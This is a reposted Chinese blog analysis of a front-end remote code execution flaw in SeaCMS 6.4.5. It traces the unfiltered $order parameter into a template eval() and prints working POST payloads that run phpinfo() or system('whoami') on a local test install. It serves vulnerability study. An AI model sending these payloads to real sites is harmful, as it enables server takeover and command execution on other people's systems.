碼上歡樂
相關內容    簡體    繁體

seacms_6.4.5 前台任意代碼執行漏洞分析

本文轉載自   查看原文   2020-04-07 15:33   814    web安全

環境搭建

1、下載安裝包
下載地址:
鏈接:https://pan.baidu.com/s/1uw_VnxnvG4GGEae4TRsGGw
密碼:cd48
2、常規安裝
image.png

漏洞復現

poc1:
http://127.0.0.1/seacms645/search.php
post:searchtype=5&order=}{end if} {if:1)phpinfo();if(1}{end if}
poc2:
POST:
searchtype=5&order=}{end if}{if:1)$_POST[func]($_POST[cmd]);//}{end if}&func=system&cmd=whoami
searchtype=5&order=}{end if}{if:1)$_POST[func]($_POST[cmd]);if(1}{end if}&func=system&cmd=whoami

漏洞分析

0x00 代碼執行簡單流程
代碼執行簡單流程

0x01 分析
總的來說就是:$order參數沒做嚴格的限制,就將其傳入了模板文件中,然后使用eval()執行模板中包含$order的代碼,通過閉合拼接語句的方式,插入惡意代碼,實現遠程命令執行。

首先是從seacms_6.45/search.php入手,這個文件包含了seacms/include/common.php,在common.php中第45-48行,將GET,POST等請求傳入的全局變量中的鍵值對轉換成變量,並對其中的值使用addslashes()進行處理:

function _RunMagicQuotes(&$svar)
{
	if(!get_magic_quotes_gpc())
	{
		if( is_array($svar) )
		{
			foreach($svar as $_k => $_v) $svar[$_k] = _RunMagicQuotes($_v);
		}
		else
		{
			$svar = addslashes($svar);
		}
	}
	return $svar;
}

foreach(Array('_GET','_POST','_COOKIE') as $_request)
{
	foreach($$_request as $_k => $_v) ${$_k} = _RunMagicQuotes($_v);
}

在seacms/search.php文件第63行,echoSearchPage()函數中,將$order變量注冊成全局變量:

global $dsql,$cfg_iscache,$mainClassObj,$page,$t1,$cfg_search_time,$searchtype,$searchword,$tid,$year,$letter,$area,$yuyan,$state,$ver,$order,$jq,$money,$cfg_basehost;

而在search.php中,執行echoSearchPage()函數之前,沒有對$order變量進行處理。在echoSearchPage()函數中,使用$searchtype來選擇使用的模板文件:

if(intval($searchtype)==5)
	{
		$searchTemplatePath = "/templets/".$GLOBALS['cfg_df_style']."/".$GLOBALS['cfg_df_html']."/cascade.html";
		$typeStr = !empty($tid)?intval($tid).'_':'0_';
		$yearStr = !empty($year)?PinYin($year).'_':'0_';
		$letterStr = !empty($letter)?$letter.'_':'0_';
		$areaStr = !empty($area)?PinYin($area).'_':'0_';
		$orderStr = !empty($order)?$order.'_':'0_';
		$jqStr = !empty($jq)?$jq.'_':'0_';
		$cacheName="parse_cascade_".$typeStr.$yearStr.$letterStr.$areaStr.$orderStr;
		$pSize = getPageSizeOnCache($searchTemplatePath,"cascade","");
	}else
	{
		if($cfg_search_time&&$page==1) checkSearchTimes($cfg_search_time);
		$searchTemplatePath = "/templets/".$GLOBALS['cfg_df_style']."/".$GLOBALS['cfg_df_html']."/search.html";
		$cacheName="parse_search_";
		$pSize = getPageSizeOnCache($searchTemplatePath,"search","");
	}

在if語句中可以看到,當$searchtype 的值為5的時候,傳入了%order參數,因此這里的$searchtype需要取值5。

下面153行,將模板文件讀取到$content變量中:

$content = parseSearchPart($searchTemplatePath);

接着在155-173行替換標簽。其中第158行使用$order替換了模板中{searchpage:ordername}標簽:

<a href="{searchpage:order-time-link}" {if:"{searchpage:ordername}"=="time"} class="btn btn-success" {else} class="btn btn-default" {end if} id="orderhits">最新上映</a>
<a href="{searchpage:order-hit-link}" {if:"{searchpage:ordername}"=="hit"} class="btn btn-success" {else} class="btn btn-default" {end if} id="orderaddtime">最近熱播</a>
<a href="{searchpage:order-score-link}" {if:"{searchpage:ordername}"=="score"} class="btn btn-success" {else} class="btn btn-default" {end if} id="ordergold">評分最高</a>

接着,在本文件的第212行:
$content=$mainClassObj->parseIf($content);
跟進去,在seacms\include\main.class.php中第3098-3147行中:

function parseIf($content)
{
    if (strpos($content, '{if:') === false) {
        return $content;
    } else {
        $labelRule = buildregx("{if:(.*?)}(.*?){end if}", "is");
        $labelRule2 = "{elseif";
        $labelRule3 = "{else}";
        preg_match_all($labelRule, $content, $iar);
        $arlen = count($iar[0]);
        $elseIfFlag = false;
        for ($m = 0; $m < $arlen; $m++) {
            $strIf = $iar[1][$m];
            $strIf = $this->parseStrIf($strIf);
            $strThen = $iar[2][$m];
            $strThen = $this->parseSubIf($strThen);
            if (strpos($strThen, $labelRule2) === false) {
                if (strpos($strThen, $labelRule3) >= 0) {
                    $elsearray = explode($labelRule3, $strThen);
                    $strThen1 = $elsearray[0];
                    $strElse1 = $elsearray[1];
                    @eval("if(" . $strIf . "){\$ifFlag=true;}else{\$ifFlag=false;}");
                    if ($ifFlag) {
                        $content = str_replace($iar[0][$m], $strThen1, $content);
                    } else {
                        $content = str_replace($iar[0][$m], $strElse1, $content);
                    }
                } else {
                    @eval("if(" . $strIf . ") { \$ifFlag=true;} else{ \$ifFlag=false;}");
                    if ($ifFlag) {
                        $content = str_replace($iar[0][$m], $strThen, $content);
                    } else {
                        $content = str_replace($iar[0][$m], "", $content);
                    }
                }
            } else {
                $elseIfArray = explode($labelRule2, $strThen);
                $elseIfArrayLen = count($elseIfArray);
                $elseIfSubArray = explode($labelRule3, $elseIfArray[$elseIfArrayLen - 1]);
                $resultStr = $elseIfSubArray[1];
                $elseIfArraystr0 = addslashes($elseIfArray[0]);
                @eval("if({$strIf}){\$resultStr=\"{$elseIfArraystr0}\";}");
                for ($elseIfLen = 1; $elseIfLen < $elseIfArrayLen; $elseIfLen++) {
                    $strElseIf = getSubStrByFromAndEnd($elseIfArray[$elseIfLen], ":", "}", "");
                    $strElseIf = $this->parseStrIf($strElseIf);
                    $strElseIfThen = addslashes(getSubStrByFromAndEnd($elseIfArray[$elseIfLen], "}", "", "start"));
                    @eval("if(" . $strElseIf . "){\$resultStr=\"{$strElseIfThen}\";}");
                    @eval("if(" . $strElseIf . "){\$elseIfFlag=true;}else{\$elseIfFlag=false;}");
                    if ($elseIfFlag) {
                        break;
                    }
                }
                $strElseIf0 = getSubStrByFromAndEnd($elseIfSubArray[0], ":", "}", "");
                $strElseIfThen0 = addslashes(getSubStrByFromAndEnd($elseIfSubArray[0], "}", "", "start"));
                if (strpos($strElseIf0, '==') === false && strpos($strElseIf0, '=') > 0) {
                    $strElseIf0 = str_replace('=', '==', $strElseIf0);
                }
                @eval("if(" . $strElseIf0 . "){\$resultStr=\"{$strElseIfThen0}\";\$elseIfFlag=true;}");
                $content = str_replace($iar[0][$m], $resultStr, $content);
            }
        }
        return $content;
    }
}

這段函數主要功能是將輸入的參數與正則匹配,之后進入eval()函數執行。
正則:

3102: $labelRule = buildregx("{if:(.*?)}(.*?){end if}","is");
3105: preg_match_all($labelRule,$content,$iar);

要想進入到eval(),$content中必須含有{if:字符串,看代碼執行流程,在eval()函數中,$strIf就是之前preg_match_all()中第一個(.*?)匹配出來的值。

@eval("if(".$strIf."){\$ifFlag=true;}else{\$ifFlag=false;}");

在eval()中,要閉合前面的if語句,可以構造1)phpinfo();if(1,又要符合正則{if:(.?)}(.?){end if},再看標簽:

<a href="{searchpage:order-time-link}" {if:"{searchpage:ordername}"=="time"} class="btn btn-success" {else} class="btn btn-default" {end if} id="orderhits">最新上映</a>

由於$order替換的是{searchpage:ordername},所以,在1)phpinfo();if(1基礎上添加:
}{end if}{if:1)phpinfo();if(1}{end if}
漏洞利用的基本流程就是這樣,簡單來說,就是有個可控的變量沒有經過過濾,就被帶入了eval()中,導致了代碼執行。

參考

https://mengsec.com/2018/08/06/SeaCMS-v6-45%E5%89%8D%E5%8F%B0%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/

https://github.com/SecWiki/CMS-Hunter/tree/master/seacms/SeaCMS%20v6.45%E5%89%8D%E5%8F%B0Getshell%20%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



猜您在找 SeaCms6.4.5 遠程代碼執行漏洞復現 i春秋——“百度杯”CTF比賽 九月場——Test(海洋cms / seacms 任意代碼執行漏洞) 任意代碼執行漏洞 任意代碼執行漏洞 ThinkPHP 2.x 任意代碼執行漏洞 復現與分析 thinkphp v5.1.29 任意代碼執行漏洞分析 代碼審計之seacms v6.45 前台Getshell 復現分析 通達OA前台任意用戶登錄漏洞復現分析 QCMS前台命令執行漏洞分析 Tomcat遠程任意代碼執行漏洞及其POC
 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM